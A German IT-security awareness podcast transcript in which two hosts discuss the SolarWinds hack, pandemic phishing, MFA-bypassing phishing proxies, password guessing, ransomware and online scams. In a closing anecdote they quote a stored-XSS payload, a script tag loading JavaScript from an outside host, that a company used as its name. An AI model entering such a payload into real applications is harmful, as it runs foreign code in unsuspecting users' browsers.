SkyTail. Online-Akademie für IT-Sicherheit.
Der SkyTail-Podcast.
Herzlich willkommen zur 11. Ausgabe unseres SkyTail-Podcasts. Auch heute wollen wir Sie wieder über aktuelle Bedrohungen, Lecks und Pannen in der IT informieren und Ihnen zeigen, was da schiefgelaufen ist und wie man das unter Umständen auch hätte verhindern können. Und natürlich ist auch, wie könnte es anders sein, Corona ein Thema bei uns. Wobei es da bei uns aber nicht um Ansteckungszahlen, um R-Werte oder Mund-Nasen-Schutz, sondern um die mit der Pandemie verbundenen Gefahren für die IT-Sicherheit geht. Und damit wir das auch alles fachlich richtig einordnen können, habe ich wie immer den Leiter der SkyTail Online-Akademie für IT-Sicherheit und IT-Sicherheitsexperten Max Siegler bei mir mit am Mikrofon. Hallo Max.
Hallo Matthias.
Max, der Aufreger der Woche, ja vielleicht des Jahres, ist ja wohl der Hack beim US-Unternehmen SolarWinds und dort hatte eine wohl staatliche russische Hackergruppe namens APT29, auch bekannt unter dem lauschigen Namen Cozy Bear, ausgerechnet die IT-Überwachungs- und Verwaltungssoftware Orion, die wird für die Administration von Routern, Switches und anderen Netzgeräten genutzt, mit der Schadsoftware Sunburst gefüttert, die dann an 18.000 Organisationen, Behörden und Unternehmen ausgeliefert wurde und dort anscheinend monatelang unbemerkt geblieben war. Wie kann sowas passieren?
Tja, man hat es tatsächlich geschafft, einen Trojaner in ein Update einzuschmuggeln und dann über Update-Server automatisch an alle Kunden zu verteilen. Ja, es gibt insgesamt ungefähr 33.000 Kunden, die dieses Produkt nutzen. Und die Hälfte davon hat es wohl schon in dieser Zeit runtergeladen. Also da ist eine Backdoor eingebaut worden, die kommunizierte dann mit diversen Command-and-Control-Servern, wie man das eben so kennt. Man konnte Module nachladen, Dateien nachladen oder eben auch austauschen. Dann wurden Systeme ausgeforscht, E-Mails mitgelesen, Antiviren-Software abgeschaltet. Eben das Übliche, was man dann eben so macht, wenn man erstmal irgendwo drin ist. Mittlerweile wird das auch von Windows Defender oder auch von anderen Antiviren-Software gut erkannt. Aber
das Kind ist im Brunnen gefallen inzwischen.
Ja, genau.
Und die betroffenen Firmen und Behörden, das sind ja auch nicht irgendwer, ne?
Ja, gut, zu den Kunden von SolarWinds gehören viele Fortune 500 Unternehmen, AT&T, Cisco, Mastercard, Microsoft, Siemens und so weiter und so weiter. US-Außenministerium könnte man noch nennen. Also ist schon eine ziemlich lange Liste. Das Peinliche ist ja wirklich auch, dass es sich hier um ein Security-Unternehmen handelt. Das ist das Ärgerliche dabei. Wer jetzt von denen tatsächlich gehackt wurde, ist immer noch unklar. Alle Betroffenen sind angeblich informiert worden, aber gut, da wird man wahrscheinlich auch nicht mehr viel von hören.
Ja, die werden das schön verschweigen, wenn sie selber betroffen sind. Und da kann man sich als Kunde ja auch kaum selber gegen schützen, wenn sowas passiert. Ausgerechnet bei einem Sicherheitsunternehmen.
Ja, das Ärgerliche ist einfach auch, dass die Updates wirklich signiert waren mit einem Schlüssel von dem Hersteller und mehr kann man da nicht machen. Also da muss man tatsächlich drauf vertrauen. Das heißt also, man kann wirklich nur immer reaktiv gucken, man muss dranbleiben, IT-News lesen, Podcasts hören.
Unseren zum Beispiel, ja.
Genau.
Max, die Zahlen, die uns da von den IT-Sicherheitsexperten von G-Data präsentiert wurden, sind ja ohnehin schon recht alarmierend. War im zweiten Quartal 2020 die Zahl der abgewehrten Cyberattacken bereits um 154% gestiegen, meldeten die Cyber-Defense-Spezialisten aus Bochum unlängst für das dritte Quartal eine weitere Verdopplung der Zahlen. Wie kommt denn sowas zustande?
Ja gut, es hat sich natürlich in diesem Jahr auch einiges bewegt durch die neue Situation, nennen wir es mal. Also der digitale Wandel wurde ja weiter massivst beschleunigt. Menschen sind im Homeoffice und da waren die Firmen wirklich auch zunächst erstmal damit beschäftigt, IT-Verfügbarkeit überhaupt herzustellen. Sicherheit kam dann häufig wirklich an zweiter Stelle. Und dann kommen Dinge dazu wie Bring Your Own Device, ne? Also dass man wirklich seinen eigenen PC nutzt, den dann auch Familienmitglieder benutzen. Man hat die Netze zu Hause vielleicht nicht so gut gesichert.
Ja.
Grundsätzlich führt es dann zu solchen Dingen, dass dann auch Firmendaten irgendwo auf dem Privatbereich oder im Privat-PC gespeichert werden und so weiter und so weiter. Dazu kommt noch eine Geschichte. Zu Hause ist man ja auch durchaus mal abgelenkt, könnte man ja so meinen, durch dies und das.
Durch die Kinder und so, ja.
Und dadurch ist vielleicht auch einfach etwas weniger Aufmerksamkeit für solche Themen da.
Ja, das kenne ich auch. Man will sich gerade irgendwo in so ein Thema rein vertiefen, dann kommt unten die Stimme, kannst du mal eben gucken, komm, der haut mich immer und so. Ne? Und schon hat man hinterher wieder vergessen, was man eigentlich wollte, ja.
Das gute alte Homeoffice.
Und wie sehen die Angriffe aus? Also welche Mittel werden da eingesetzt?
Ja gut, zum einen sind es Cyberangriffe über die klassische Schadsoftware. Also ich meine, mittlerweile gibt es ja mehr als 1 Milliarde Schadprogramme. Es gibt über 300.000 neue Schadprogramme an jedem einzelnen Tag, die dann per E-Mail-Anhang verschickt werden. Ne? Also viele alte Bekannte, über die haben wir ja auch schon viel gesprochen. Agent Tesla, Rainimbot, Emotet und so weiter und so weiter.
Mhm.
Und damit werden dann einfach Dinge wie Anmeldedaten aus Browsern abgegriffen oder Mail-Kontakte. Das ist natürlich sehr praktisch, wenn man irgendwo Passwörter eingibt, die für das Unternehmen relevant sind, Tastatureingaben mitgezeichnet oder Screenshots gemacht und so weiter und so weiter.
Und davon sind jetzt aber nicht nur die Leute betroffen, die im Homeoffice arbeiten, oder?
Ja, natürlich nicht. Also das ist ja wirklich nur eine physische Location, was ja für die Menschen im Internet eigentlich erstmal ziemlich irrelevant ist. Auch die Unternehmensgröße oder Branche ist vollkommen irrelevant. Da sind wirklich alle Branchen quer durch betroffen. Ne? Also Verwaltungen, Kliniken, Pharmakonzerne, Hochschulen, Behörden und so weiter.
Mhm.
Also, aber es ist auf jeden Fall wirklich erkennbar, ein Großteil der Angriffe erfolgt aktuell wirklich über die Mitarbeiter zu Hause oder über spezielle Phishing-Mails in dieser Richtung.
Und beim Phishing wenden die Kriminellen ja inzwischen auch viel Energie auf. Also die Betrugsversuche sind sehr aufwendig und gut gemacht und die können zum Teil auch nur mit viel Erfahrung durchschaut werden.
Ja, die werden natürlich auch immer besser. Da kann man nur wirklich dranbleiben. Man kann Trainings buchen, Phishing-Trainings, wie wir das beispielsweise auch anbieten, wo wir Phishing-E-Mails verschicken. Man kann allgemein sich in diesem Bereich bilden und schauen, was sind die üblichen Angriffsmaschen.
Mhm.
Und am Ende ist es das, was zählt. Ich meine, ein Phishing-Filter, natürlich hat mittlerweile auch jedes Unternehmen, aber die Angriffe werden natürlich besser. Und das ist das gute alte Paradigma, wenn man auf der einen Seite den Phishing-Filter zu hart einstellt, dann kommen keine E-Mails mehr durch. Wenn man ihn zu lasch einstellt, kommen einfach zu viele Phishing-E-Mails durch.
Da kann man nur die Mitarbeiter trainieren, ne? Als letzte Instanz.
Das bleibt dann als letztes Glied in der Kette, genau.
Die meisten Phishing-Websites setzen inzwischen ja sogar Verschlüsselung ein. 3/4 davon haben inzwischen gültige HTTPS-Zertifikate, was ja früher eigentlich mal schon fast so eine Garantie für eine vertrauenswürdige Website war, ne?
Ja, das ist natürlich heutzutage deutlich einfacher geworden und es ist auch eher auffällig, wenn man das heute nicht mehr hat. Also es ist schon Standard, dass man heute ein Sicherheitszertifikat hat und man bekommt die ja auch kostenlos von Let's Encrypt beispielsweise. Und insofern springen dann natürlich auch die Bösewichte drauf auf. Und was ja noch mit dazu kommt, muss man sagen, bei diesen ganzen Phishing-E-Mails, dass mehr als die Hälfte dann auch bekannte Markennamen nutzen und einsetzen. Ne? Also man sieht dann vieles von Amazon, PayPal, Apple, Microsoft Office, Netflix, auch sehr beliebt jetzt gerade in diesen Zeiten, oder Instagram.
Mhm.
Und die sind dann auch deutlich schneller geworden, muss man sagen. Ne? Also erbeutete Passwörter werden dann innerhalb von 4 Stunden eingesetzt, manchmal sogar wirklich in Echtzeit. Und so schnell kann man dann kaum reagieren und sein Passwort ändern.
Also ich habe jetzt mal gelesen, sogar die Multifaktor-Authentifizierung soll nicht mehr sicher sein. Stimmt das?
Ja, das ist tatsächlich so. Da haben sich die Angreifer auch ein bisschen was Neues ausgedacht. Es gibt sogenannte Echtzeit-Phishing-Proxies, also RTPP abgekürzt. Und die sollen eben auch die Multifaktor-Authentisierung umgehen können, beziehungsweise austricksen können. Umgehen wird schwierig. Also Multifaktor-Authentisierung ist ja beispielsweise sowas, Amazon bietet das an oder PayPal, dass man sich anmeldet mit einem Benutzernamen und Passwort und dann noch als zweites so eine Zufallszahl eingeben muss, die auf deinem Handy generiert wird.
Ja.
Oder dass du eine SMS bekommst oder ähnliche Dinge. Und damit soll man eben verhindern, wenn ich jetzt dein Passwort rausbekommen habe oder selbst wenn ich einmal so einen Faktor mitlesen kann, kann ich es beim nächsten Mal eben nicht. Und diese Phishing-Proxies gehen jetzt her und hängen sich zwischen deine Verbindung, wenn du dich jetzt gerade anmelden möchtest bei Amazon und gibst in Echtzeit quasi dieses Token ein, dieses One-Time-Token, dann greifen die das ab und leiten das dann selber weiter und nutzen das für die eigene Anmeldung. Und du bekommst davon eigentlich gar nichts mit.
Hm.
Ja, also so kann man dann wirklich hergehen und dann diese Multifaktor-Authentisierung, die Codes nutzen für die eigene Anmeldung. Man kann dann Session-Cookies stehlen und so weiter und so weiter. Also kann man eine Menge mit anstellen.
Wobei sich ja viele Cyberkriminelle gar nicht erst die Mühe machen, Passwörter zu erbeuten, ist schon fast so umständlich, sondern die versuchen einfach, die Passwörter zu erraten. Also Brute Force und Credential Stuffing Angriffe wird das wohl genannt, ne?
Ja gut, das ist der klassische Weg, den gibt es eigentlich schon immer, Passwörter einfach zu erraten. Ich würde also, bleiben wir beim Beispiel Amazon, auch wenn es an der Stelle tatsächlich nicht funktioniert, die haben gute Schutzmaßnahmen dagegen. Ich würde dann einfach hergehen, ich kenne einen Usernamen, oder das ist ja klassischerweise die E-Mail-Adresse, und dann probiere ich einfach alle möglichen Passwörter dieser Welt aus. A, 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 A und so weiter und so weiter.
Aber die tippst du nicht von Hand ein, ne? Entschuldige, dass ich unterbreche, aber du setzt dich nicht am Computer und die werden nicht von Hand eingetippt, sondern die haben da wahrscheinlich irgendwelche Automatismen drin.
Das könnte so ein bisschen dauern, ja. Genau. Du kannst dir das ja relativ gut ausrechnen, wenn du sagst, du hast einen Zeichenvorrat von 26 Zeichen, also wenn du jetzt wirklich nur Kleinbuchstaben nimmst, dann kannst du dir das ja ausrechnen, indem du dann wirklich sagst, je nach Länge wächst das Ganze an. Also bei 2 Zeichen hättest du dann quasi schon 26 hoch 2 und so weiter und so weiter. Und je mehr Zeichen man verwendet, umso komplexer ist eben dieser Zahlenraum, umso mehr muss ich ausprobieren, um wirklich dahin zu kommen. Also das ist wirklich die klassische Brute Force, also wirklich harte Gewalt. Das andere, was eigentlich auch sehr häufig zum Ziel führt, ist die Nutzung von Wörterbüchern, dass man eben hergeht, man hat die ganzen klassischen Namen der Fußballvereine beispielsweise drin oder der Ehefrauen, kombiniert mit Jahreszahlen und die probiert man dann einfach durch. Das ist in sehr vielen Fällen mindestens genauso, wenn nicht sogar viel erfolgsversprechender, weil man eben auch nicht so wahnsinnig viel durchprobieren muss.
Ich glaube, einige Hörer werden sich jetzt gerade an die eigene Nase packen und denken, ich sollte vielleicht doch mal Ursula 12 abändern.
Oder BVB 09 oder ähnliche.
Ja, oder Schalke 00. Na gut, das war jetzt gemein. Ein paar Zahlen noch zum Thema Phishing am Rande. Mit 67% sind die USA das Top-Hosting-Land für Phishing-Angriffe. Deutschland folgt aber direkt dahinter auf einem unrühmlichen Platz 2 und fast 2/3 aller Attacken stammen von einem mobilen Kanal. Das wollte ich nur mal eben loswerden.
Ja, hast du recht. Ich meine, Smartphones werden jetzt auch immer leistungsfähiger, das mobile Internet immer schneller. Unterm Strich ist es tatsächlich das Angriffswerkzeug der Zukunft. Ne? Ich kann dann auch wirklich mal schnell in ein mobiles WLAN reingehen, in ein offenes und von da aus wirklich was starten. Also unlängst wurde auch tatsächlich die erste DDoS-Attacke über Smartphones aufgedeckt.
DDoS-Attacke, musst du vielleicht mal kurz erklären?
Ja, DDoS ist eine Erweiterung der DOS-Attacken. DOS ist einfach klassisch Denial-of-Service-Angriff, wo ich dann versuche, über möglichst viel Traffic oder wirklich aufwendige Anfragen einen Server lahmzulegen, indem ich den einfach überlastet und distributed, oder das D steht eben für Distributed Denial of Service Attack. Das ist eben ein verteilter Denial of Service Angriff, wo ich dann wirklich mehrere Clients nutze und dann gleichzeitig einen Server bombardiere mit Anfragen.
Und dafür braucht man bisher doch eigentlich eine Unmenge von PCs, ne? Und das geht jetzt mit einem Smartphone, wie das?
Ja, auch hier nutzt man so einen ähnlichen Mechanismus wie mit den Updates, die wir eben gehört haben. Es gibt im App Store oder gab im App Store, im Play Store eine App namens Android Update und die wurde über 50.000 Mal runtergeladen und dann hat man eine eigene Webseite gebaut und erst war das dann wirklich ohne Malware im Store und dann wurde das per Update an den Nutzer einfach nachgeliefert. Und mit diesem Schadcode konnte man dann tatsächlich jedes Smartphone individuell ansteuern. Also so eine Art Zombie-Smartphone nennt man das dann. Und damit hat man dann mehrere Webseiten 7 Stunden lang attackiert. Und ja, dabei waren eigentlich nur 10% der überhaupt infizierten Smartphones beteiligt.
Aber das scheint ja dann schon auszureichen, wenn man genug hat. Wenn man 50.000 Leute, die sowas runterladen, sollte man vielleicht auch mal ein bisschen vorsichtiger sein. Aber gut, im Play Store geht man eigentlich davon aus, dass die Sachen in Ordnung sind und wenn die erst nachher die Mailbelt aufspielen, ist man eigentlich auch schon wieder schutzlos. Da muss man einfach doppelt aufpassen.
Ja, die haben gute Schutzmechanismen, aber tatsächlich genau dieses Nachladen, das kann dann wirklich, wenn man es gut anstellt, leider durch die Kontrollen durchgehen.
Ja, also ich hatte letztens auch einen Artikel gelesen mit der Überschrift Deutschlands Einbrecherschulen um. Wegen Corona wären Wohnungseinbrüche schwer geworden. Da wäre Cyberkriminalität das einfachere und auch lukrativere Geschäft. Ist da was dran? Kann ich mir gar nicht vorstellen.
Ja, ich meine, du musst dir vorstellen, die meisten, oder nein, nicht die meisten Menschen, aber sehr viele Menschen sind derzeit im Homeoffice. Und das führt natürlich dazu, dass es das Haus quasi permanent bewohnt oder bewacht ist. Die Lücken werden also schwieriger für die Kriminellen. Man muss sich ein bisschen was Neues ausdenken. Und man muss ja auch dazu sagen, es gibt mittlerweile die Möglichkeiten, Cybercrime-Tools im Darknet zu kaufen. Da gehört zwar schon einiges an Fachwissen dazu, aber eigentlich kannst du die Botnetze und alles Mögliche fertig irgendwo einkaufen oder mieten. Dann schaust du dir noch ein paar Tutorials irgendwo an, die es dazu gibt, und dann los geht's, die ganze Geschichte.
Ja, ja. Auf YouTube, ne? Also, wie werde ich ein Cyberkrimineller in 3 Tagen? Also das, alles ist möglich inzwischen im Netz. Aber nochmal zurück zum Thema Phishing. Da machen sich die Kriminellen ja auch speziell das Thema Corona zunutze. Also soll keiner sagen, die wären da nicht auf dem neuesten Stand.
Richtig, also die EU-Kommission warnt zum Beispiel wieder vor gefälschten Antragsformularen für Corona-Überbrückungshilfen, die auf kleine und mittelständische Unternehmen abzielen, um dann eben vertrauliche Daten abzugreifen. Absender, ja, der erfundene Sprecher der EU-Kommission, Svetla Bobeva.
Kennt ja jeder, ja.
Natürlich, ist ja bekannt. die Domain ist ec-europa.eu, klingt ja jetzt auch schon nicht ganz schlecht. Das Ganze war im Juli schon mal unterwegs, damals unter dem Namen Reinhard Hönighaus, dem echten Sprecher der EU-Kommission.
Aha.
Aber wie immer, in diesem Fall, Mail löschen, Anhang nicht öffnen.
Und auch sonst gibt es ja inzwischen massig Phishing-Mails mit Corona-Bezug und viele davon zielen dann wieder auf die Arbeitnehmer im Homeoffice ab, auf die armen Leute.
Genau, wir hatten das Thema ja eben schon so ein bisschen angerissen. Also Top 10 in diesem Quartal waren beispielsweise Urlaub. Also bitte lesen Sie die Anforderungen des neuen Urlaubsgesetzes, Update der Richtlinien für Urlaube. Es ging um den Zugang, ne? Geplante Serverwartung, Homeoffice, kein Internetzugang.
Mhm.
Es ging um die Gesundheit. Das ist immer ein gutes Thema, zumindest aktuell. Man macht ja den Menschen auch ein bisschen damit Angst. Offizielle Quarantänebenachrichtigung und sowas. Ne? Also wie in vielen Fällen oder wie eigentlich immer beim Phishing,
ja.
Man wird dazu gebracht, durch Angst, Unsicherheit oder wirklich auch Zweifel darauf zu klicken, die Anhänge zu öffnen. Und pandemiebedingt, momentan wird man sowieso von Nachrichten überfordert und überflutet, hat man auch natürlich ein leicht eingeschränktes Urteilsvermögen, ne? Der darf man auch nicht vergessen.
Ja, das stimmt. Das merke ich bei mir selber auch inzwischen, dass ich Sachen anklicke, die ich mir sonst nie angeschaut hätte. Und hinzu kommt ja auch noch, dass wir alle gerade mehr online einkaufen und deshalb auch vermehrt auf Paketsendungen warten. Und auch das haben einige einfallsreiche Kriminelle ausgenutzt. Stichwort Mail vom Zoll.
Mail vom Zoll oder eben auch DHL, ne, ihre Sendung kommt oder wird verspätet zugeliefert, wird beim Nachbarn oder wurde beim Nachbarn abgestellt. Auf solche Dinge springen die natürlich dann auch auf.
Ja.
Also Benachrichtigung Zollkundendienst, dann sind das so Dinge wie, das Paket hängt irgendwo im Zoll fest, wird erst geliefert, wenn man seine Gebühren bezahlt hat und so weiter und so weiter. Wenn man also nicht tatsächlich eine echte Sendungsnummer da drin hat, mit einem echten Empfänger oder auch Absender, dann sollte man wirklich sehr hellhörig werden und vorsichtig werden.
Ja, man wird auch eigentlich immer bei Behördensachen namentlich angesprochen und man hat irgendwo seine Steuernummer oder sonst irgendwas stehen. Und vor allen Dingen verschickt der Zoll, glaube ich, auch keine Steuerbescheide per Mail, wenn die nicht vorher irgendwie jemanden zu dem Vorgang befragt haben. Ne?
Richtig, also da sollte man durchaus hellhörig werden in solchen Fällen. Es wird halt einfach immer wieder schön angepasst an die neueste Situation. Und ja, die Masche ist aber eigentlich unterm Strich immer die gleiche.
Ja, man muss einfach immer wieder vorsichtig sein und dreimal überlegen, erwarte ich ein Paket und steht da mein Name und wie sieht die Sache aus? Und im Zweifelsfall einfach löschen, wenn es wirklich echt war. Die schreiben nochmal, keine Sorge. Die lassen nie locker.
Genau.
Weniger zum Thema Phishing, aber zum Thema Corona gehört auch die ganz neue Masche auf der Ferienhausplattform Booking.com. Ferienwohnungen dann einfach mal mit sehr kulanten Rücktrittsregelungen anzubieten.
Da werden dann beispielsweise keine Stornogebühren versprochen, ne? Also Stornogebühren bei Rücktritt oder Umbuchung. Und dann geben die eine WhatsApp-Nummer an, über die man dann direkt mit dem Vermieter den Vertrag abschließen kann.
Aha.
Und ihm anschließend das Geld vorab überweist, also an Booking.com vorbei. Da sollte man schon mal ein bisschen hellhörig werden. Am Ende, wer hätte es geahnt, gibt es weder Ferienwohnungen noch Vermieter. Die Fotos der Wohnungen sind geklaut, genau wie die Identität. Und das Geld ist selbstverständlich weg.
Apropos geklaute Identität, ich habe gelesen, 86% der Verbraucher sind in diesem Jahr schon Opfer von Identitätsdiebstahl oder Kreditkartenbetrug geworden oder von einer Datenschutzverletzung. Das besagt das jährliche Consumer Barometer von OPSEC, also so viel zum Thema, sowas passiert doch immer nur den anderen.
Ja, leider ist es nicht ganz so. Genau, der Diebstahl von digitalen Identitäten ist wirklich häufig Ausgangspunkt der meisten Straftaten im Bereich Cybercrime. Diese Identitäten werden dann einfach besorgt über Datenlecks, also wirklich ungewollten Datenabfluss oder wirklich großen Data Breaches, wo dann wirklich aktiv auch Informationen abgegriffen werden durch Cyberkriminelle. Mhm. Und hat man erstmal so eine Identität, hat man erstmal einen ganz guten Startpunkt, um dann weitere Maßnahmen danach zu ergreifen, ne, weitere Schritte.
Mhm. Und dazu passen ja auch die Zahlen, dass laut einer Umfrage unter 1000 deutschen Arbeitnehmern 79%, das finde ich unglaublich, der deutschen Büroangestellten bedenkenlos immer noch E-Mails von unbekannten Absendern öffnen. Und zwei Drittel öffnet eine Mail, wenn sie augenscheinlich vom Chef kommt. Jeder vierte öffnet sie einfach, wenn einfach nur dringend drüber steht. Also ich finde, das ist kein Wunder, dass dann 28% der Befragten schon mindestens einmal Opfer einer Phishing-Attacke waren. Und nur jeder zehnte von denen hat das dann auch seinem Arbeitgeber gemeldet.
Ja, das ist einfach sehr, sehr, sehr traurig. Diese Umfrage kenne ich auch und das deckt sich eigentlich auch mit den Erfahrungen, die wir machen in Phishing-Trainings, also oder in Phishing-Mail-Simulationen, wenn wir die raussenden, bevor wir wirklich da auch die Mitarbeiter geschult haben, klickt einfach wirklich ein sehr großer Teil der Empfänger da drauf.
Mhm.
Und am Ende ist es tatsächlich so, knapp unter 10% sehen dann wirklich die Verantwortung danach überhaupt bei sich selbst, während dann ein ganz großer Teil, also wirklich zwei Drittel laut dieser Umfrage, sagen, Sicherheit ist doch Sache der IT-Abteilung.
Ja.
Damit habe ich doch nichts zu tun. Und genau das versuchen wir halt immer wieder zu vermitteln. Die IT-Abteilung tut halt schon, was sie kann, aber am Ende muss jeder dazu beitragen, sein eigenes Unternehmen zu unterstützen oder zu schützen, ne?
Mhm.
Und da muss dann wirklich ein Umdenken stattfinden. Und da ist tatsächlich wirklich viel Luft nach oben. Also ungefähr 15% der Befragten gab dann an, dass ihre Firma überhaupt schon mal ein Security-Training angeboten hatte. Das ist auch noch nicht so wahnsinnig viel.
Und so ein Security-Training ist ja auch wirklich eine gute Investition, weil wenn jetzt jemand sagt, naja, so groß wird der Schaden schon nicht sein, wenn mal was passiert. Laut einer IBM-Studie von 2020 betragen die Kosten bei einem Cyberangriff in Unternehmen durchschnittlich $4 Millionen, also etwa durch Umsatzverluste oder Wiederherstellung der Systeme. Beim Reedereikonzern Maersk lag der Schaden sogar mal bei $300 Millionen und beim Pharmazieunternehmen Merck gar bei $600 Millionen. Also das ist schon eine Menge Geld, die dann verloren geht.
Da kommt eine Menge zusammen, ne? Also wirklich diese ganzen Wiederherstellungskosten. Was man nicht vergessen darf, sind so Kosten für Lösegeldzahlungen nach einer Ransomware-Attacke. Ne? Also das ganze System wird gesperrt und du kriegst den Schlüssel nur, wenn du wirklich auch Lösegeld bezahlst. Und tatsächlich ist dabei in Deutschland laut Statistik am meisten zu holen. Also 43% der deutschen Unternehmen zahlen wirklich nach so einem Angriff.
Mhm.
Und in den USA sind es nur 27%. Niederlande 20 oder in UK 13%. Die sind also etwas anders gestrickt. Und sowas spricht sich dann natürlich rum in den einschlägigen Kreisen. Geh doch mal nach Deutschland, da hast du die besten Chancen.
Ja, stimmt. Wir mal wieder. Wir führen in manchen Tabellen, wo wir eigentlich gar nicht so weit oben sein möchten. Bestes Beispiel dafür, unlängst wurde der japanische Spielehersteller Capcom erpresst. Dabei wurden 350.000 Nutzerdaten sowie Geschäftsinterne, also Verträge, Release-Termine von Games und so weiter ins Netz gestellt. Aber Capcom war eben einfach nicht bereit, das Lösegeld zu zahlen. Also du siehst, das sind Japaner, die sagen, nö, machen wir nicht, macht doch, was ihr wollt, wir zahlen nicht. Das finde ich eigentlich auch die bessere Methode. Aber mal was ganz anderes, ich habe letztens gelesen, dass Cyberkriminalität ein saisonales Geschäft sei. Was heißt das?
Ja, wir haben ja eben so ein bisschen darüber gesprochen, dass sich Cyberkriminelle auch anpassen, also eben wirklich Corona-bedingt was bringen. Aber beispielsweise saisonal könnte man sagen, zu Beginn der Urlaubszeit kommen dann Massenmails mit gefälschten Urlaubsangeboten, ne? Beispielsweise. Also im Juli stieg die Zahl der Angriffe zum Beispiel um 176%.
Mhm.
Auch zu Weihnachten gibt es gute Statistiken. Also auch da gibt es vermehrt Fake-Seiten und Angebote zum Online-Shopping beispielsweise. Also Cyberkriminelle sind da wie immer ziemlich anpassungsfähig und flexibel. Beispielsweise sind seit Beginn der Corona-Pandemie die Angriffe auf Fluggesellschaften und Hotels um 67% zurückgegangen. Also man merkt schon, das lohnt sich gerade nicht wirklich.
Max, lass uns unseren Podcast doch mal nach so vielen Hiobsbotschaften und erschreckenden Zahlen versöhnlich mit einer einigermaßen lustigen Sicherheitsmeldung aus der Abteilung nicht ganz zu Ende gedacht beschließen. Es geht um einen britischen Entwickler, der seiner neuen Beratungsfirma den sehr einprägsamen Namen script src=https://mjt.xss.ht größer LTD verpasst hatte. Fand er wohl lustig, aber das britische Handelsregister weniger.
Ja, ich finde das tatsächlich auch sehr lustig. Wenn man aus dem Bereich der Web-Security kommt, weiß man eigentlich, wohin das Ganze führt. Und zwar hat er diesen Namen gewählt, weil es eben auch ausführbaren Code beinhaltet. Mhm. Das heißt, wenn man diesen Namen irgendwo jetzt eingibt in eine Datenbank und dann wird das wieder angezeigt in einer Webanwendung. Ne? Also man stellt sich vor, dass irgendwo auf dem Amt eine Webanwendung genutzt wird, um die Firmen- und Handelsregister zu verwalten. Dann wird dieser Code eben dort eingefügt anstelle des Firmennamens. Mhm. Und wenn das nicht sauber geprüft wird, dann wird eben dieses JavaScript, was da aufgerufen wird, du hast ja eben gesagt, Script Source gleich so und so, wird dann eben eingebettet in den Browser und ausgeführt. Also eine sogenannte Cross-Site-Scripting-Attacke oder eben auch genauer gesagt persistentes Cross-Site-Scripting. Persistent deswegen, weil es wirklich persistent in der Datenbank gespeichert wird. Und es wird dann einfach angezeigt, da muss ich als Mitarbeiter, kann ich auch tatsächlich gar nichts für. Also der Fehler liegt dann in der Applikation, die das nicht sauber interpretiert oder sauber escaped. Und als Mitarbeiter muss ich nur ganz normal meine Arbeit tun. Ich gehe auf die Seite drauf, will diesen Firmennamen bearbeiten oder irgendwas dazu ansehen. Es wird in irgendeiner Liste angezeigt und schon wird der Code ausgeführt und führt eben dazu, zu dem Üblichen, man sollte seine Webseiten sauber überprüfen, bevor man die online gibt. Man sollte ein Security Audit machen, man sollte seine Entwickler schulen und das Übliche. Ne? Also am Ende hat es dazu geführt, in diesem konkreten Fall, der Mensch musste seine Firma umbenennen. Sie heißt jetzt That Company Whose Name Used to Contain HTML Script Tags. Also, er ist weiter lustig geblieben, aber es ist auf jeden Fall kein Script Tag jetzt mehr drin enthalten.
Der muss eine große Visitenkarte haben, wenn die Firmennamen dann mit da draufstehen. Apropos Vorsicht bei der Namenswahl, da fällt mir auch eine Geschichte ein. Die Firma, die seit vielen Jahren hier bei mir die PCs wartet, die hieß früher tatsächlich mal IS Network, also IS Network. Und als dann die Sache mit dem IS-Terror vom Islamischen Staat hochkochte, war der Name natürlich plötzlich recht missverständlich geworden. IS Network, also drohten Anfragen von der völlig falschen Seite. Und am Ende musste er wirklich dann seine Firma umbenennen. Sehr also schön. Hoffen wir mal, dass SkyTail dann dieses Schicksal erspart bleibt, dass nicht irgendwann eine Terrorgruppe diesen Namen annimmt. Max, ich danke dir wie immer auf jeden Fall für deine erhellenden Kommentare und Erklärungen und wünsche unseren Zuhörern, bleiben Sie gesund, sicher und zuversichtlich. Bis zum nächsten Mal. Tschüss, Max.
Ja, tschüss, Matthias.
SkyTail. Online-Akademie für IT-Sicherheit.